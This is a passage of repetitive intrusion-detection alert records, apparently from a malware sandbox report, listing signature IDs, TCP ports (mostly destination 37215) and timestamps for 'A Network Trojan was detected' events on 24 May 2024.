              SID:2829579
              Source Port:49266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290183
              SID:2835222
              Source Port:36980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595521
              SID:2835222
              Source Port:44926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197299
              SID:2835222
              Source Port:39362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349840
              SID:2835222
              Source Port:54450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234438
              SID:2829579
              Source Port:60326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396684
              SID:2835222
              Source Port:60576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100674
              SID:2829579
              Source Port:55960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857127
              SID:2829579
              Source Port:51500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625280
              SID:2835222
              Source Port:35492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661314
              SID:2829579
              Source Port:52098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207150
              SID:2829579
              Source Port:34612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425897
              SID:2835222
              Source Port:41684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575160
              SID:2835222
              Source Port:33928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400451
              SID:2835222
              Source Port:44262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696263
              SID:2835222
              Source Port:46258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443973
              SID:2829579
              Source Port:41594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492508
              SID:2829579
              Source Port:40352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116164
              SID:2829579
              Source Port:43046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448763
              SID:2829579
              Source Port:56892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424170
              SID:2835222
              Source Port:59558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245870
              SID:2829579
              Source Port:59216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103599
              SID:2829579
              Source Port:47206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631770
              SID:2829579
              Source Port:46288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480898
              SID:2835222
              Source Port:41862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664495
              SID:2835222
              Source Port:38204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041017
              SID:2829579
              Source Port:58390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600139
              SID:2835222
              Source Port:39774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775480
              SID:2829579
              Source Port:60102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680462
              SID:2829579
              Source Port:43792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.660863
              SID:2835222
              Source Port:56886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624481
              SID:2829579
              Source Port:33176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361081
              SID:2835222
              Source Port:56654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478366
              SID:2829579
              Source Port:59170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341076
              SID:2835222
              Source Port:55110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.488248
              SID:2829579
              Source Port:41130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828514
              SID:2829579
              Source Port:33488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284644
              SID:2829579
              Source Port:40956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053108
              SID:2835222
              Source Port:51048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530869
              SID:2835222
              Source Port:39116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926886
              SID:2829579
              Source Port:56570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168069
              SID:2835222
              Source Port:42992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372012
              SID:2829579
              Source Port:59750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457767
              SID:2829579
              Source Port:41162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681366
              SID:2829579
              Source Port:54816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535362
              SID:2835222
              Source Port:52798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062372
              SID:2835222
              Source Port:35202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550580
              SID:2829579
              Source Port:39708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516355
              SID:2829579
              Source Port:47776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048642
              SID:2835222
              Source Port:43170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115202
              SID:2829579
              Source Port:50102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169660
              SID:2829579
              Source Port:47300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520160
              SID:2829579
              Source Port:37044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857113
              SID:2835222
              Source Port:51192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976571
              SID:2829579
              Source Port:43358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695709
              SID:2829579
              Source Port:41744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250703
              SID:2835222
              Source Port:42876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542466
              SID:2835222
              Source Port:33050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859816
              SID:2835222
              Source Port:58406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478315
              SID:2829579
              Source Port:56810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249604
              SID:2829579
              Source Port:32872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637676
              SID:2835222
              Source Port:50564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574415
              SID:2835222
              Source Port:47110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124861
              SID:2829579
              Source Port:58930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504157
              SID:2835222
              Source Port:50378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578021
              SID:2835222
              Source Port:53738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856536
              SID:2835222
              Source Port:34540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055340
              SID:2835222
              Source Port:39920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078052
              SID:2835222
              Source Port:38640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374060
              SID:2835222
              Source Port:46154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111321
              SID:2829579
              Source Port:46002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049924
              SID:2829579
              Source Port:58454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267098
              SID:2835222
              Source Port:34696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.427389
              SID:2829579
              Source Port:46398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055712
              SID:2829579
              Source Port:44156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329797
              SID:2835222
              Source Port:53502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749055
              SID:2835222
              Source Port:36188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157665
              SID:2829579
              Source Port:54460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368494
              SID:2835222
              Source Port:51312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070559
              SID:2829579
              Source Port:58372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099265
              SID:2829579
              Source Port:35254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545085
              SID:2835222
              Source Port:33396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637751
              SID:2835222
              Source Port:51092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622762
              SID:2829579
              Source Port:60488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188129
              SID:2835222
              Source Port:46872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062258
              SID:2835222
              Source Port:37698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099185
              SID:2835222
              Source Port:55358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.593798
              SID:2829579
              Source Port:57688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153952
              SID:2829579
              Source Port:35024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885240
              SID:2829579
              Source Port:54972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.771836
              SID:2829579
              Source Port:55210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539904
              SID:2829579
              Source Port:43538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278264
              SID:2829579
              Source Port:34636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398327
              SID:2835222
              Source Port:34038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059554
              SID:2835222
              Source Port:40246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482105
              SID:2835222
              Source Port:34224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127432
              SID:2829579
              Source Port:41872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152701
              SID:2829579
              Source Port:52424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546352
              SID:2835222
              Source Port:59432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989557
              SID:2835222
              Source Port:34476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926049
              SID:2829579
              Source Port:53570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.076341
              SID:2829579
              Source Port:38124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596586
              SID:2829579
              Source Port:47582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575455
              SID:2829579
              Source Port:57474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309250
              SID:2835222
              Source Port:42282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313701
              SID:2829579
              Source Port:35190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542323
              SID:2829579
              Source Port:53308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063753
              SID:2835222
              Source Port:55966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595411
              SID:2829579
              Source Port:60154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428902
              SID:2835222
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642749
              SID:2829579
              Source Port:54786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725986
              SID:2829579
              Source Port:56592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063081
              SID:2835222
              Source Port:57410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110940
              SID:2829579
              Source Port:34646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.434487
              SID:2835222
              Source Port:45866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798858
              SID:2829579
              Source Port:46836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347768
              SID:2829579
              Source Port:40986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453749
              SID:2835222
              Source Port:34810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457686
              SID:2829579
              Source Port:48802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187565
              SID:2829579
              Source Port:34322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537249
              SID:2835222
              Source Port:59164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064555
              SID:2835222
              Source Port:48922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053681
              SID:2835222
              Source Port:36798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.765055
              SID:2829579
              Source Port:45878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575294
              SID:2829579
              Source Port:37870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113297
              SID:2829579
              Source Port:59636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347617
              SID:2835222
              Source Port:55458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625221
              SID:2829579
              Source Port:36242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100676
              SID:2829579
              Source Port:33830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116335
              SID:2829579
              Source Port:46254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164046
              SID:2829579
              Source Port:52982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390674
              SID:2829579
              Source Port:60056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864836
              SID:2835222
              Source Port:44582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.102283
              SID:2829579
              Source Port:50874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193949
              SID:2835222
              Source Port:57432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545148
              SID:2829579
              Source Port:33032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200610
              SID:2829579
              Source Port:38674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478195
              SID:2829579
              Source Port:37488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285896
              SID:2835222
              Source Port:52080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060083
              SID:2829579
              Source Port:48632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127423
              SID:2835222
              Source Port:34282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456668
              SID:2829579
              Source Port:52714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727905
              SID:2829579
              Source Port:54168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230807
              SID:2835222
              Source Port:60156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232650
              SID:2835222
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057383
              SID:2835222
              Source Port:40450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480161
              SID:2829579
              Source Port:44528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707856
              SID:2829579
              Source Port:54502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456811
              SID:2835222
              Source Port:39494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872303
              SID:2829579
              Source Port:58232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114631
              SID:2829579
              Source Port:34740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624800
              SID:2835222
              Source Port:59354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457004
              SID:2829579
              Source Port:44832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044979
              SID:2835222
              Source Port:39168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485492
              SID:2835222
              Source Port:37858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474701
              SID:2829579
              Source Port:51940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738918
              SID:2835222
              Source Port:45884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988436
              SID:2829579
              Source Port:43132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329720
              SID:2835222
              Source Port:33326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534363
              SID:2829579
              Source Port:50262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358625
              SID:2835222
              Source Port:44312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435420
              SID:2835222
              Source Port:43464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:53.358215
              SID:2030490
              Source Port:33340
              Destination Port:1235
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279682
              SID:2835222
              Source Port:52894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309182
              SID:2829579
              Source Port:56520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870420
              SID:2835222
              Source Port:43050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2829579
              Source Port:42614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118530
              SID:2835222
              Source Port:50864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823625
              SID:2829579
              Source Port:42438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395513
              SID:2829579
              Source Port:40080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483054
              SID:2829579
              Source Port:45490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252677
              SID:2835222
              Source Port:37962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300278
              SID:2829579
              Source Port:37534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.192989
              SID:2829579
              Source Port:42088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768357
              SID:2829579
              Source Port:45972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377438
              SID:2835222
              Source Port:53714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636011
              SID:2829579
              Source Port:55562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860342
              SID:2835222
              Source Port:40082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341055
              SID:2835222
              Source Port:50798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796096
              SID:2829579
              Source Port:44192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334125
              SID:2835222
              Source Port:45340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125387
              SID:2829579
              Source Port:34116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.968814
              SID:2835222
              Source Port:32984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756467
              SID:2829579
              Source Port:39170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431641
              SID:2835222
              Source Port:51104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574541
              SID:2829579
              Source Port:43866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458352
              SID:2829579
              Source Port:38250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662545
              SID:2829579
              Source Port:39992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198784
              SID:2829579
              Source Port:37880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697401
              SID:2835222
              Source Port:38876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640912
              SID:2835222
              Source Port:48622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361028
              SID:2829579
              Source Port:60090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871988
              SID:2829579
              Source Port:51988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698342
              SID:2835222
              Source Port:59042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518971
              SID:2829579
              Source Port:56096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.585650
              SID:2829579
              Source Port:40790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594891
              SID:2829579
              Source Port:59660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117330
              SID:2829579
              Source Port:50702
              Destination Port:37215
